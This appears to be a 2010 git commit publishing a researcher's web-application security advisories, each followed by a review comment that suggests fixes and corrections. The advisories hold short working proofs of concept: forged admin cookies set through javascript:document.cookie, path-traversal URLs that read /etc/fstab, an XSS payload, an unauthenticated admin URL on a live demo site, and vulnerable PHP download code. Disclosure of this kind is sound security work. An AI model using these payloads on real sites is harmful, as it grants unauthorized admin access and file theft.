Updating README for public release. - advisories - Security advisories that I have released to the public.
---
commit 16b8a1f3cce6a98f8e31c667a56b73f5ac826960
Author: Jay Scott <me@jay.scot>
Date: Thu, 15 Apr 2010 20:08:34 +0100
Updating README for public release.
Diffstat:
A README | 11 +++++++++++
A arcade-trade-script-exploit.txt | 68 +++++++++++++++++++++++++++++++
A aterr-exploits.txt | 101 +++++++++++++++++++++++++++++++
A big-lick-mailing-list.txt | 23 +++++++++++++++++++++++
A big-lick-website-backup.txt | 51 +++++++++++++++++++++++++++++++
A filecopa-exploit.txt | 65 +++++++++++++++++++++++++++++++
A million-dollar-text-links-exploit.… | 62 +++++++++++++++++++++++++++++++
A php-siteLock-exploit.txt | 74 +++++++++++++++++++++++++++++++
A star-articles-exploit.txt | 67 +++++++++++++++++++++++++++++++
9 files changed, 522 insertions(+), 0 deletions(-)
---
diff --git a/README b/README
@@ -0,0 +1,11 @@
+
+ __ __ __ __ ___ __
+ /\ | \ \ / | /__` / \ |__) | |__ /__`
+/~~\ |__/ \/ | .__/ \__/ | \ | |___ .__/
+
+---
+
+
+This repo contains various security-related advisories I have released
+over the years. Most of the public releases are web application-based,
+with the odd remote buffer overflow exploit.
diff --git a/arcade-trade-script-exploit.txt b/arcade-trade-script-exploit.txt
@@ -0,0 +1,68 @@
+
+
+ Arcade Trade Script
+ Insecure Cookie Handling
+ ===========================
+
+
+
+
+ SUMMARY
+ ________
+
+ Arcade Trade Script is a full arcade site CMS (Content Management System)
+ with easy customization and advanced traffic trading system built in.
+ With ATS you will hardly ever have to FTP anything. Almost all files,
+ pages, and meta tags can be edited from the admin panel. ATS is extremely
+ easy to use and works for both regular arcades and full blown traffic
+ trading arcades.
+
+ Please note that this issue has now been fixed!
+
+
+
+ IMPACT
+ _______
+
+ Leads to full administration rights on the CMS admin panel.
+
+
+
+ VERSIONS
+ _________
+
+ Vulnerable systems: ATS versions prior to 1.0
+
+ Immune systems: None
+
+
+
+ DESCRIPTION #1
+ ______________
+
+ Insecure cookie handling allows anyone to simply create a custom cookie
+ with the values below. This will allow full access to the admin panel.
+
+ Name - adminLoggedIn
+ Content - true
+ Path - /
+
+
+ Proof of Concept:
+ -> javascript:document.cookie="adminLoggedIn=true; path=/"
+
+ Fix:
+ -> None given.
+
+
+
+ ADDITIONAL INFO
+ _______________
+
+
+ Vendor URL - www.arcadetradescript.com
+ Underlying OS - Linux (Any), UNIX (Any), Windows (Any)
+ Credit - Jay Scott
+ Message History - Vendor notifyied and problem fixed
+ the following day.
+
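Review bot: The VERSIONS and Fix sections contradict the rest of the advisory: "Please note that this issue has now been fixed!" and "Message History - Vendor notifyied and problem fixed the following day" say a fix exists, yet "Immune systems: None" and "Fix: -> None given." say otherwise. State the first fixed version under Immune systems and, under Fix, describe the remediation (keep the logged-in state in a server-side session and never treat a client-supplied adminLoggedIn cookie as an authorization decision). Also "notifyied" should read "notified".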
diff --git a/aterr-exploits.txt b/aterr-exploits.txt
@@ -0,0 +1,101 @@
+Aterr Forums Multiple Vulnerabilities
+
+
+
+SUMMARY
+--------
+
+Aterr is a threaded forum system allowing registered visitors to express
+their opinions, discuss topics, and debate with other visitors. A threaded
+forum system differs from regular, flat forum systems in that once posted,
+a thread can fork, allowing visitors to reply directly to other posts. aterr
+also provides a customisable permissions system, the ability to nest forums,
+and moderation tools.
+
+
+
+IMPACT
+-------
+
+Can lead to Disclosure of system information, Disclosure of user information
+and Modification of forum setup.
+
+
+
+VERSIONS
+---------
+
+Vulnerable systems:
+ * Aterr versions prior to 0.4
+
+Immune systems:
+ * Aterr version 0.5
+
+
+
+DESCRIPTION #1 - Modification of Forum Setup
+--------------
+
+The file forums.php fails to check that an administrator has the correct
+privileges to log into the admin panel and edit the forum setup such as
+changing the logo, title etc.
+
+
+Proof of Concept:
+
+ www.yoursite.com/forums/forums.php?op=admin&sub=config
+
+Fix:
+
+Add the following too forums.php starting at line 1393 :
+
+ 1393 : if (!permission::has_flag('forums', F_FORUM_EDIT))
+ 1394 : {
+ 1395 : redirect('http://' . $config['domain_name'] . $config['install_path'] . forums::furl('admin'));
+ 1396 : }
+
+
+
+DESCRIPTION #2 - Disclosure of User Information
+--------------
+
+Not filtering HTML of the Topic header allows XSS exploits to be added to
+any forum post.
+
+
+Proof of Concept:
+
+Enter the following as a topic header:
+ <script>alert(document.cookie); </script>
+
+FIX:
+
+None given, upgrade to new version.
+
+
+
+DESCRIPTION #3 - Disclosure of System Information
+--------------
+
+No check is made to see if a vaild profile has been selected. When a invaild
+profile has been requested the forum discloses full path information to the
+user.
+
+
+Proof of Concept:
+
+ www.yoursite.com/forums/accounts.php?op=viewprofile&u=
+
+FIX:
+
+None given, upgrade to new version.
+
+
+ADDITIONAL INFORMATION
+-----------------------
+
+Vendor URL - http://chimaera.starglade.org
+Underlying OS - Linux (Any), UNIX (Any), Windows (Any)
+Credit - Jay Scott
+Message History - None
+
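Review bot: The VERSIONS block leaves version 0.4 unclassified ("prior to 0.4" vulnerable, "0.5" immune); state whether 0.4 is affected. In the Description #1 fix, the snippet is anchored to "line 1393", which will drift between releases; name the enclosing function or the code it should precede instead, and note that unless redirect() terminates the script itself the block needs an exit() after the redirect, otherwise the admin config code still runs for the unprivileged request. Typos: "Add the following too forums.php" should read "to", and "vaild"/"invaild" in Description #3 should read "valid"/"invalid".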
diff --git a/big-lick-mailing-list.txt b/big-lick-mailing-list.txt
@@ -0,0 +1,23 @@
+
+
+Name Big Lick Media: Mailing List
+Severity High
+Vendor www.biglickmedia.com
+Authors Jay Scott
+Date 10th Jan 2009
+Status Vendor has NOT been informed
+
+
+DESCRIPTION
+
+Poor coding allows anyone to download a file on the host without
+requiring authentication.
+
+
+EXPLOIT
+
+Simply go to the following address in a web browser. Change the file
+variable to the file you wish to download.
+
+<path to application>/dl.php?file=/etc/fstab
+
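Review bot: Unlike the other advisories this file has no VERSIONS or FIX section, and "Status Vendor has NOT been informed" means it is published with no remediation on record. The description "Poor coding allows anyone to download a file on the host" should name the class of bug the PoC shows (the file parameter of dl.php is passed an absolute path, i.e. unrestricted file read via path traversal) and give the mitigation: resolve the requested name inside a fixed download directory and reject any result that escapes it.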
diff --git a/big-lick-website-backup.txt b/big-lick-website-backup.txt
@@ -0,0 +1,51 @@
+
+
+Name Big Lick Media: Website Backup
+Severity High
+Vendor www.biglickmedia.com
+Authors Jay Scott
+Date 10th Jan 2009
+Status Vendor has NOT been informed
+
+
+DESCRIPTION
+
+Poor coding allows anyone to download a file on the host without
+requiring authentication.
+
+
+EXPLOIT
+
+Simply go to the following address in a web browser. Change the file
+variable to the file you wish to download.
+
+<path to application>/download.php?file=/etc/fstab
+
+
+VULNERABLE CODE
+
+$filename = $_GET['file'];
+
+// required for IE, otherwise Content-disposition is ignored
+if(ini_get('zlib.output_compression'))
+ ini_set('zlib.output_compression', 'Off');
+
+$file_extension = strtolower(substr(strrchr($filename,"."),1));
+
+switch( $file_extension )
+{
+ case "gz": $ctype="application/x-gzip"; break;
+ case "zip": $ctype="application/zip"; break;
+ default: $ctype="application/download";
+}
+header("Pragma: public"); // required
+header("Expires: 0");
+header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
+header("Cache-Control: private",false); // required for certain browsers
+header("Content-Type: $ctype");
+header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
+header("Content-Transfer-Encoding: binary");
+header("Content-Length: ".filesize($filename));
+readfile("$filename");
+exit();
+
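Review bot: The VULNERABLE CODE section shows the defect but the advisory gives no fix: "$filename = $_GET['file'];" flows unchanged into filesize($filename) and readfile("$filename"), and the only processing applied is extracting the extension to pick a Content-Type. Add a FIX section stating that the script should map the parameter to a file under a fixed backup directory (basename() the input, realpath() the joined path, and check the result still starts with that directory) and return 404 otherwise. This file also repeats the header and description of big-lick-mailing-list.txt verbatim apart from the script name; say whether these are two products sharing one download routine or the same bug in two scripts.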
diff --git a/filecopa-exploit.txt b/filecopa-exploit.txt
@@ -0,0 +1,65 @@
+FileCOPA FTP Server
+
+
+
+SUMMARY
+--------
+
+FileCOPA takes the hard work out of running an FTP Server. The FileCOPA
+FTP Server Software installs on any version of the Microsoft Windows
+operating system with just a few clicks of the mouse and automatically
+configures itself for anonymous operation.
+
+
+
+IMPACT
+-------
+
+Can lead to Denial of Service Attack and remote system access.
+
+
+
+VERSIONS
+---------
+
+Vulnerable systems:
+ * Unknown version number.
+ * Version released 10/11/2005
+
+Immune systems:
+ * Version released after 28/11/2005
+
+
+
+DESCRIPTION
+------------
+
+FileCOPA fails to check the CWD buffer the length of the input in
+the CMD FTP command. If you pass 1036 characters to CWD it will crash
+the FTP server allowing no more connections to the service.
+
+
+Proof of Concept:
+
+ POC C code for a DOS attack and remote access exploit was given
+ to the vendor. The POC is not for public release.
+
+
+Fix:
+
+ Upgrade to latest version.
+
+
+
+
+ADDITIONAL INFORMATION
+-----------------------
+
+Vendor URL - http://www.filecopa.com/
+Underlying OS - Windows (Any)
+Credit - Jay Scott
+
+History - 18/11/05 - Vendor Contacted
+ - 19/11/05 - Vendor Acknowledged
+ - 21/11/05 - New version released
+
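Review bot: The description sentence "FileCOPA fails to check the CWD buffer the length of the input in the CMD FTP command" is garbled and names two commands (CWD and CMD); it should say that the server does not bound the length of the argument to the CWD command before copying it into a fixed-size buffer. The dates also disagree: VERSIONS says immune versions are those "released after 28/11/2005", while History records "21/11/05 - New version released"; state which release carries the fix. "DOS attack" should read "DoS attack".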
diff --git a/million-dollar-text-links-exploit.txt b/million-dollar-text-links-exploit.txt
@@ -0,0 +1,62 @@
+
+
+ Million Dollar Text Links
+ Authentication bypass
+ ===========================
+
+
+
+
+ APP SUMMARY
+ ____________
+
+ Now that the market is overcrowded with million dollar graphic
+ pages where the users get links back to their site, here is how
+ you can add your "twist" to encash the million dollar craze.
+ Use this script to generate adsense revenue, promote your
+ links, get backward links to your site or simply to manage your
+ link exchange.
+
+
+
+ IMPACT
+ _______
+
+ Leads to full administration rights of the admin panel.
+
+
+
+ VERSIONS
+ _________
+
+ Vulnerable systems: All versions
+
+ Immune systems: None
+
+
+
+ DESCRIPTION #1
+ ______________
+
+ No authentication checks on the admin home page allows anyone to
+ just browse to the admin contol panel and bypass the login
+ procedure.
+
+
+ Proof of Concept:
+ -> http://www.kalptarudemos.com/demo/million/admin.home.php
+
+ Fix:
+ -> None given.
+
+
+
+ ADDITIONAL INFO
+ _______________
+
+
+ Vendor URL - http://www.cmsnx.com/product.about.php?id=12
+ Underlying OS - Linux (Any), UNIX (Any), Windows (Any)
+ Credit - Jay Scott
+ Message History - Vendor Contacted.
+ No reply after 30 days
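Review bot: The proof of concept points at a third-party demo host ("http://www.kalptarudemos.com/demo/million/admin.home.php") rather than the "<path to application>/" form used in the other advisories; a published advisory should not direct readers at a live site. Since "Vulnerable systems: All versions" and "Fix: -> None given.", the Fix section should at least state the remediation: admin.home.php must verify an authenticated admin session before rendering anything. Typo: "contol" should read "control".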
diff --git a/php-siteLock-exploit.txt b/php-siteLock-exploit.txt
@@ -0,0 +1,74 @@
+
+
+ PHP SiteLock
+ Insecure Cookie Handling
+ ===========================
+
+
+
+
+ SUMMARY
+ ________
+
+ PHP Site Lock: A highly secure website login script which has
+ features like User Authentication & Management, Website
+ Password Protection , protection of pdf , images , etc.
+
+
+
+ IMPACT
+ _______
+
+ Leads to full administration rights of the admin panel.
+
+
+
+ VERSIONS
+ _________
+
+ Vulnerable systems: All versions
+
+ Immune systems: None
+
+
+
+ DESCRIPTION #1
+ ______________
+
+ Insecure cookie handling allows anyone to simply create a custom cookie
+ with the values below. This will allow full access to the admin panel.
+
+ Name - user_type
+ Content - admin
+ Path - /
+
+ Name - login_name
+ Content - admin
+ Path - /
+
+ Name - login_id
+ Content - 0
+ Path - /
+
+
+ Proof of Concept:
+ -> javascript:document.cookie="user_type=admin; path=/"
+ -> javascript:document.cookie="login_name=admin; path=/"
+ -> javascript:document.cookie="login_id=0; path=/"
+
+ Fix:
+ -> None given.
+
+
+
+ ADDITIONAL INFO
+ _______________
+
+
+ Vendor URL - www.phpsitelock.com
+ Underlying OS - Linux (Any), UNIX (Any), Windows (Any)
+ Credit - Jay Scott
+ Message History - Vendor Contacted.
+ No reply after 30 days
+
+
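Review bot: The product name appears as both "PHP SiteLock" (title) and "PHP Site Lock" (summary); use one spelling. With "Fix: -> None given." and no vendor reply after 30 days, the Fix section should state the mitigation: the three cookies (user_type, login_name, login_id) are client-controlled and must not be used as the authorization decision; the admin panel should read the user's role from server-side session state keyed by an unguessable session identifier. Also tidy the spacing in "Password Protection , protection of pdf , images , etc."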
diff --git a/star-articles-exploit.txt b/star-articles-exploit.txt
@@ -0,0 +1,67 @@
+
+
+ Star Articles
+ Insecure Cookie Handling
+ ===========================
+
+
+
+
+ SUMMARY
+ ________
+
+ Ready to use article, news, joke, tutorial site script with
+ more features than you can think of . . . Manage a large
+ collection of articles, jokes , tutorials and anything else
+ for your niche and get features like automatic RSS
+ generation , easy contents syndication , automated link
+ exchange and everything else (Including inbuilt 13 POWERFUL
+ SEO TOOLS)that MAKES YOUR LIFE EASY.
+
+
+ IMPACT
+ _______
+
+ Leads to full administration rights on the CMS admin panel.
+
+
+
+ VERSIONS
+ _________
+
+ Vulnerable systems: Versions prior to 5.0
+
+ Immune systems: None
+
+
+
+ DESCRIPTION #1
+ ______________
+
+ Insecure cookie handling allows anyone to simply create a custom cookie
+ with the values below. This will allow full access to the admin panel.
+
+ Name - admin_user
+ Content - admin
+ Path - /
+
+
+ Proof of Concept:
+ -> javascript:document.cookie="admin_user=admin; path=/"
+
+ Fix:
+ -> None given.
+
+
+
+ ADDITIONAL INFO
+ _______________
+
+
+ Vendor URL - www.stararticles.com
+ Underlying OS - Linux (Any), UNIX (Any), Windows (Any)
+ Credit - Jay Scott
+ Message History - No response from vendor after
+ 30 days.
+
+
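Review bot: "Vulnerable systems: Versions prior to 5.0" alongside "Immune systems: None" is contradictory; either 5.0 is immune or the vulnerable range is "All versions". As with the other cookie advisories, "Fix: -> None given." should state that the admin_user cookie is client-supplied and that the admin panel must instead check a server-side session. The summary paragraph is pasted marketing copy with odd spacing ("think of . . .", "jokes , tutorials", "TOOLS)that"); trim it to a one-line product description.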